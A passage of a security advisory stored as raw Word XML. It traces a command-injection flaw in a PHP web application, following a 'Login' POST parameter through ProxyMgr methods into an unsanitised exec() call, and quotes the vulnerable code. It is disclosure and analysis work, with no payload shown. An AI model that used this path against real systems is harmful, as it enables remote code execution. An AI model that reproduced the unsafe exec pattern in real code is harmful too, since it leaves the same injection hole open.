            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="351D1536" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B696567" w14:textId="2D1DB26E" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6563DF6E" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>bConnectionOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Connect( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>params );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7891E1" w14:textId="77B9628E" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72FEB1BE" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0"/>
    <w:p w14:paraId="23F92533" w14:textId="46BB7E78" w:rsidR="008C7D3B" w:rsidRDefault="00E304A0">
      <w:r>
        <w:t>9) The “Connect” method is a wrapper method which just calls “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConnectWithReply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C7D3B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B">
        <w:t>ConnectWithReply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B">
        <w:t xml:space="preserve"> instantiates the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B">
        <w:t>ProxyMgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B">
        <w:t>” class (</w:t>
      </w:r>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>/include/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>ProxyMgr.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B">
        <w:t>) and calls the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C7D3B" w:rsidRPr="008C7D3B">
        <w:t>getProxyPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C7D3B">
        <w:t>” method on this class</w:t>
      </w:r>
      <w:r w:rsidR="000C10D8">
        <w:t>. The “$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C10D8">
        <w:t>hostPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C10D8">
        <w:t>” parameter contains our tainted input that originally came from the “Login” POST parameter. To be exact, it contains everything from the port onward, as the “Login” parameter was split at the first colon:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C7D3B" w14:paraId="29466778" w14:textId="77777777" w:rsidTr="009509B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4C1FFF33" w14:textId="77777777" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>function Connect($params)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028E1409" w14:textId="38576103" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA33BD8" w14:textId="36904E6E" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        return $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ConnectWithReply</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>$params, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>throw_away_reply</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543B8524" w14:textId="49866681" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7827170D" w14:textId="1B75C246" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAF632" w14:textId="591DAD5F" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ConnectWithReply</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>$params, &amp;$reply)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0453A2C0" w14:textId="2345A623" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD4F40B" w14:textId="77777777" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C7C8FE6" w14:textId="623BDFBC" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="008C7D3B">
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008C7D3B">
              <w:t>mgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008C7D3B">
              <w:t xml:space="preserve"> =&amp; new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008C7D3B">
              <w:t>ProxyMgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008C7D3B">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="008C7D3B">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0318A6" w14:textId="545B3830" w:rsidR="000C10D8" w:rsidRPr="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F62916" w14:textId="77777777" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$port = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>mgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>getProxyPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>hostAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>hostPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B26FF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>, true )</w:t>
            </w:r>
            <w:r w:rsidRPr="000C10D8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A07D36A" w14:textId="67A7FF33" w:rsidR="008C7D3B" w:rsidRDefault="008C7D3B" w:rsidP="009509B1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E310E46" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9"/>
    <w:p w14:paraId="4FB658AF" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9">
      <w:r>
        <w:t xml:space="preserve">10) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getProxyPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ultimately calls “$this-&gt;_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>launchProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)”:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="007270F9" w14:paraId="0CAEB49C" w14:textId="77777777" w:rsidTr="007270F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="645A58A3" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>getProxyPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>hostAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>forceRefresh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=false )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5703B7E4" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05DA33D0" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC80D55" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="007270F9">
              <w:t>$this-&gt;_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>launchProxy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>port, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>hostAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007270F9">
              <w:t>hostPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007270F9">
              <w:t xml:space="preserve"> );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B349E6D" w14:textId="569088E3" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="149CA883" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9"/>
    <w:p w14:paraId="610BB285" w14:textId="599BA8EE" w:rsidR="007270F9" w:rsidRDefault="007270F9">
      <w:r>
        <w:t>11) We finally get to the vulnerable “_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>launchProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D52039">
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where our code execution takes place. In the following code, you will see that “$port” (which contains the port from the POST Login parameter and everything following that port) is concatenated into a command line string, which is then executed via “exec”:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="007270F9" w14:paraId="53110F53" w14:textId="77777777" w:rsidTr="007270F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="62BB7F38" w14:textId="6A1A4DD9" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>function _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>launchProxy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>port</w:t>
            </w:r>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0C8440" w14:textId="19374F8C" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513A5D39" w14:textId="490B5FA2" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        $path = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SAW::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>config( '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProxyPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4717229B" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        // $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>maxSession</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SAW::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>config( '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MaxSession</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' ); Use -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProxyOptions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> line for this, not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MaxSession</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> extra </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ini</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> setting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D977869" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>proxydata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SAW::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>config( '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProxyDataPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E14C1BC" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D58FE1F" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$launch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = $path."</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ossicm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -h</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>cmhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>." -p".$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>." -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>l".</w:t>
            </w:r>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>." -d".$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>proxydata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>." -s";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C4EE25" w14:textId="1AE5727A" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF0CCBF" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        $launch = $launch." </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".SAW::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>config('Local');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46EB83EB" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5430A19E" w14:textId="77777777" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        $result = </w:t>
            </w:r>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>exec($launch</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007270F9">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="024E16E6" w14:textId="39CBC9B4" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225FDF95" w14:textId="556695F1" w:rsidR="007270F9" w:rsidRDefault="007270F9" w:rsidP="007270F9">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="022D4BDA" w14:textId="77777777" w:rsidR="000C10D8" w:rsidRDefault="000C10D8"/>
    <w:p w14:paraId="60C0A3FA" w14:textId="301F1B6B" w:rsidR="000C10D8" w:rsidRDefault="000C10D8">
      <w:r>
        <w:t xml:space="preserve">Below is sample </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pstree</w:t>
      </w:r>
